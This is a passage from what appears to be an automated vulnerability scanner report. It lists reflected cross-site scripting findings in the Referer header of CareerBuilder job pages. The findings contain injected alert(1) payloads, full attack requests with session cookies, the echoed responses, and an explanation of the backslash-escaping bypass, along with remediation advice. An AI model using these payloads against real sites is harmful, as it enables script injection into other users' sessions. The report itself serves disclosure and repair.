s_cb.eVar5='JS_AS_City | State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - c01d8\\';alert(1)//66349a66c26';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.263. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsPayable.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsPayable.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffdf8\'%3balert(1)//964dda6ef0c was submitted in the Referer HTTP header. This input was echoed as ffdf8\\';alert(1)//964dda6ef0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami_AccountsPayable.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=ffdf8\'%3balert(1)//964dda6ef0c

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 175013
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR12
Date: Sun, 14 Nov 2010 23:15:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar5='JS_AS_City | State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - ffdf8\\';alert(1)//964dda6ef0c';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.264. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsPayable.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsPayable.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd21d\'%3balert(1)//0eb9870a374 was submitted in the Referer HTTP header. This input was echoed as cd21d\\';alert(1)//0eb9870a374 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami_AccountsPayable.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=cd21d\'%3balert(1)//0eb9870a374

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174943
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR30
Date: Sun, 14 Nov 2010 23:00:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar5='JS_AS_City | State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - cd21d\\';alert(1)//0eb9870a374';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.265. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsReceivable.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsReceivable.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd0bd\'%3balert(1)//90fb2f6d989 was submitted in the Referer HTTP header. This input was echoed as cd0bd\\';alert(1)//90fb2f6d989 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami_AccountsReceivable.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=cd0bd\'%3balert(1)//90fb2f6d989

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 175006
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountsreceivable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR24
Date: Sun, 14 Nov 2010 23:00:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar5='JS_AS_City | State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - cd0bd\\';alert(1)//90fb2f6d989';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.266. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsReceivable.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsReceivable.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc7b1\'%3balert(1)//e155036bc0b was submitted in the Referer HTTP header. This input was echoed as cc7b1\\';alert(1)//e155036bc0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to preven